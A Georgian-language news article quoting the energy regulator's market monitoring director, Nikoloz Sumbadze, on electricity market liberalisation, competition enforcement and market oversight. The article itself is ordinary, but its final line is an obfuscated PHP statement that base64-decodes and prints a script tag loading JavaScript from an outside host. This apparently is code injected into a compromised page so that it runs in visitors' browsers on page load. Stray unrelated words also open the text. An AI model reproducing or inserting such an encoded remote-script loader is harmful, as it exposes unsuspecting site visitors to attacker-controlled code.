celsiusi
ავერსი შნაიდერი

„ენერგეტიკული ბაზრის რეფორმა საქართველოსთვის ერთ-ერთ მნიშვნელოვან ნაბიჯს წარმოადგენს ენერგეტიკის სექტორში, რომელიც ევროკავშირის პოლიტიკასთან ჰარმონიზაციას უზრუნველყოფს“ - როგორც სემეკის ბაზრის მონიტორინგის დირექტორი ნიკოლოზ სუმბაძე აცხადებს, რეფორმის ერთ-ერთ მიზანს ბაზრის ლიბერალიზაცია და კონკურენცია წარმოადგენს. მისივე თქმით, ამ მიმართულებით სემეკი არაერთ მნიშვნელოვან ცვლილებას ახორციელებს.

„ენერგეტიკული ბაზრის რეფორმის პროცესის ერთ-ერთი მნიშვნელოვანი ნაწილია ბაზრის ლიბერალიზაცია და კონკურენციის ხელშეწყობა. ენერგეტიკული ბაზრის ლიბერალიზაციისა და გამართული ფუნქციონირების უზრუნველსაყოფად სემეკი აქტიურად მუშაობს მარეგულირებელი ჩარჩოს გაუმჯობესებაზე.

მნიშვნელოვანია აღინიშნოს, რომ ენერგეტიკული ბაზრის რეფორმის ფარგლებში იცვლება რამდენიმე მთავარი პრინციპი და ემატება ახალი სავაჭრო სეგმენტები. კერძოდ, ბაზრის ახალ მოდელში ბაზრის მონაწილეები პასუხისმგებლები იქნებიან უბალანსობაზე, სადაც თვითდისპეტჩირების პრინციპის გათვალისწინებით ვაჭრობას განახორციელებენ საათობრივად, წარმოების ან მოხმარების ნომინაციების შესაბამისად.

ამ პრინციპების გათვალისწინებით, ახალი ბაზრის პირობებში ელექტროენერგიით ვაჭრობა იქნება დინამიკური პროცესი, რაც, თავის მხრივ, საჭიროებს მონიტორინგს და ზედამხედველობას, რათა გამოირიცხოს ბაზარზე გარიგებები, ფასის ხელოვნური დაფიქსირება და დომინანტური მდგომარეობის ბოროტად გამოყენება.

აღსანიშნავია, რომ „კონკურენციის შესახებ“ საქართველოს კანონის მიხედვით, ენერგეტიკის სექტორში კონკურენციის კანონმდებლობის აღმასრულებელი ორგანოა სემეკი. ასევე, „ენერგეტიკისა და წყალმომარაგების შესახებ“ საქართველოს კანონით განსაზღვრულია კომისიის კომპეტენცია ენერგეტიკულ ბაზარზე ეფექტიანი კონკურენციის უზრუნველყოფასთან მიმართებით.

ამ მიზნით კომისიის მიერ დამტკიცდა „ენერგეტიკული ბაზრის მონიტორინგისა და ანგარიშგების წესები“, რომელშიც თავმოყრილია ბაზრის კვლევის, კონცენტრაციების კონტროლისა და, კონკურენციის კანონმდებლობის დარღვევის დადასტურების შემთხვევაში, შესაბამისი საწარმოების სანქცირების პროცედურები".- აცხადებს ნიკოლოზ სუმბაძე.

ნიკოლოზ სუმბაძე ასევე აღნიშნავს, რომ სექტორში კონკურენციის გაზრდა თავად მომხმარებელს მოუტანს სარგებელს.

„კონკურენცია ბაზარზე საშუალებას აძლევს საწარმოებს კონკურენცია გაუწიონ ერთმანეთს თანაბარი პირობებით, რაც აიძულებს მათ მუდმივად შეეცადონ, რომ შესთავაზონ მომხმარებლებს საუკეთესო პროდუქტები საუკეთესო ფასად. აღნიშნული კი განაპირობებს ინოვაციებს და გრძელვადიან ეკონომიკურ ზრდას, ასევე წარმოადგენს თავისუფალი და დინამიკური ლიკვიდური ბაზრის მიღწევისა და ეკონომიკური კეთილდღეობის განვითარების მთავარ ინსტრუმენტს.

ენერგეტიკის სექტორში ბაზრის მონიტორინგი და კონკურენციის კანონმდებლობის აღსრულება კომისიის ერთ-ერთი მნიშვნელოვანი საქმიანობაა, რაც განსაკუთრებულ მნიშვნელობას იძენს ენერგეტიკული ბაზრის მიმდინარე რეფორმისთვის. კომისია მუდმივ რეჟიმში ახორციელებს ენერგეტიკული ბაზრის მიმდინარე პროცესებისა და ბაზრის მონაწილეთა ქმედებების მონიტორინგს, რათა მაქსიმალურად დაცული იყოს ბაზარზე კონკურენტული, თავისუფალი, გამჭვირვალე და სამართლიანი ვაჭრობის პირობები. ამ მიზნით, ასევე მიმდინარეობს რეგულირებადი სექტორების დიგიტალიზაციის პროცესი, რაც როგორც კომისიის შიდა პროცესებს, ისე საწარმოებთან ინფორმაციის გაცვლის და ზოგადად საწარმოებთან და მომხმარებლებთან ურთიერთობის პროცესებს დააჩქარებს.

ენერგეტიკული ბაზრის ლიბერალიზაცია მიზნად ისახავს ენერგეტიკულ ბაზარზე კონკურენციის გაზრდას, რაც, თავის მხრივ, უზრუნველყოფს ქვეყნის ენერგეტიკული რესურსების ეფექტიანად გამოყენებას, ბაზარზე გამჭვირვალე ფასწარმოქნას, საბაზრო რისკების ბაზრის მონაწილეებზე გადანაწილებას, ეს კი გრძელვადიან პერიოდში ფასების შემცირებას უწყობს ხელს და უზრუნველყოფს მომხმარებლების კეთიდღეობას“.- განაცხადა ნიკოლოზ სუმბაძემ.

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");